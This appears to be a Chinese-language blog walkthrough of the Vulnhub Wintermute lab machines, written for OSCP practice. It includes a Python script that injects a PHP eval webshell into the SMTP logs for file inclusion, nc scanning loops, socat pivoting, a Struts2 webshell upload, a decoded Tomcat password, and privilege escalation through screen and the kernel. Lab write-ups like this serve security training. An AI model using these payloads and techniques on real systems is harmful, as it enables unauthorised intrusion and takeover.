

r0ckyzzz's Blog.

Vulnhub靶机Wintermute通关笔记

r0ckyzzz's Blog.

Vulnhub靶机Wintermute通关笔记

vulnhub OSCP

Word count: 567Reading time: 2 min

 2020/03/19   Share

• 
• 
• 
• 
• 

Vulnhub靶机Wintermute通关笔记

¶前言

这里有两台靶机还有网卡设置要注意

¶开始

¶第一台Straylight

nmap 扫描

开放了25 80 3000端口

80端口动画太慢了我直接看源码

根本没思路等了好久 试了postfix smtp配合破壳漏洞也不行

原来3000端口可以用http访问。。。
登陆上了3000端口

发现有几个目录
跟进

/turing-bolo/这个目录有意思

怀疑文件包含

确定存在文件包含 会自动在后面加后缀.log

想包含apache日志文件 但是linux下的日志文件是access_log没有.所以不能包含

自己写了的phpinfo 执行成功！

exp如下

from socket import *
import sys

def netFormat(d):
    d += "\n"
    return d.encode('hex').decode('hex')

s = socket(AF_INET, SOCK_STREAM)
s.connect(('192.168.3.96', 25))
data = netFormat("mail from:<?php @eval($_POST[cmd]);?>")
s.send(data)

写个马进去

查看SUID
screen4.5.0 可以提权 以前做过

提权成功

flag和note

接下来应该就要通过这个已经提权的机器来打另外一台机器了

¶第二台Neuromancer

主机发现
for p in $(seq 1 255);do ping -c 1 192.168.123.$p 2>&1 ;done | grep "bytes from"

另一台靶机ip为192.168.123.10

端口扫描
for p in $(seq 1 65535);do nc -nvz -w 1 192.168.123.10 $p 2>&1 ;done | grep -v "refused"

也可以装一个nmap来扫描

也可以用nc来扫描端口

nc -znv 192.168.123.10 1-65535

然后用这种方式来判断端口开放的是什么服务

端口转发

socat tcp-listen:8889,fork tcp:192.168.123.10:8009&
socat tcp-listen:8888,fork tcp:192.168.123.10:8080&
socat tcp-listen:34483,fork tcp:192.168.123.10:34483&

tomcat服务器

来到note提示的页面

struts2 盲猜有struts2漏洞

果然

上传一个木马

蚁剑连接后查看tomcat-user

解码
lady3jane:>!Xx3JanexX!<

尝试用ssh登陆

linux登陆账号为小写字母 大写是登陆不上的

成功

再做一个端口转发用于传输文件

socat tcp-listen:8000,fork tcp:192.168.3.55:8000&

sudo -l 和SUID都没有什么好的发现

那就是内核提权 这个以前做过

提权成功得到flag

Author：r0ckyzzz

原文链接：http://r0cky.xyz/2020/03/19/Wintermute/

发表日期：March 19th 2020, 4:21:00 pm

更新日期：March 19th 2020, 4:26:53 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  Vulnhub靶机Tr0ll:1通关笔记
• Previous Post
  Vulnhub靶机Raven2通关笔记

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. Vulnhub靶机Wintermute通关笔记
   1. 1.1. ¶前言
   2. 1.2. ¶开始
      1. 1.2.1. ¶第一台Straylight
      2. 1.2.2. ¶第二台Neuromancer



• Archive
• Tag
• Cate

Total : 37

2021

• 08/02利用captcha_trainer进行验证码识别

2020

• 04/04HTB靶机Jeeves通关笔记
• 04/03HTB靶机Shocker、Blue、Bank通关笔记
• 04/02HTB靶机Lame、Leagcy、Bashed、Popcorn通关笔记
• 03/27Vulnhub靶机LiterallyVulnerable通关笔记
• 03/26Vulnhub靶机SickOS1.1通关笔记
• 03/25# Vulnhub靶机SkyTower通关笔记
• 03/24Vulnhub靶机VulnOS2通关笔记
• 03/24Vulnhub靶机pwnlab_init通关笔记
• 03/23Vulnhub靶机Stapler通关笔记
• 03/22Vulnhub靶机FristiLeaks_1.3通关笔记
• 03/21Vulnhub靶机DeRPnStiNK通关笔记
• 03/21Vulnhub靶机LordOfTheRoot_1.0.1通关笔记
• 03/20Vulnhub靶机W1r3s通关笔记
• 03/19Vulnhub靶机Tr0ll:1通关笔记
• 03/19Vulnhub靶机Wintermute通关笔记
• 03/18Vulnhub靶机Raven2通关笔记
• 03/17Vulnhub靶机Raven1通关笔记
• 03/17Vulnhub靶机Lampiao通关笔记
• 03/16Vulnhub靶机GoldenEye通关笔记
• 03/15Vulnhub靶机DC-9通关笔记
• 03/15Vulnhub靶机DC-8通关笔记
• 03/14Vulnhub靶机DC-7通关笔记
• 03/13Vulnhub靶机DC-6通关笔记
• 03/10Vulnhub靶机DC-5通关笔记
• 03/10Vulnhub靶机DC-4通关笔记
• 03/08Vulnhub靶机DC-3通关笔记
• 03/06Vulnhub靶机DC-2通关笔记
• 03/05Vulnhub靶机DC-1通关笔记
• 02/22局域网DNS劫持
• 02/22Wifi-pumpkin
• 02/22攻防世界Web进阶区部分writeup
• 02/22攻防世界Web进阶区部分writeup 2
• 02/22CISCN Web love_math
• 02/22CVE-2018-4878复现
• 02/22CISCN Web1 Justsoso
• 02/22免杀相关

Security security ctf vulnhub Vulnhub OSCP vulhub Linux环境变量 HTB htb



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

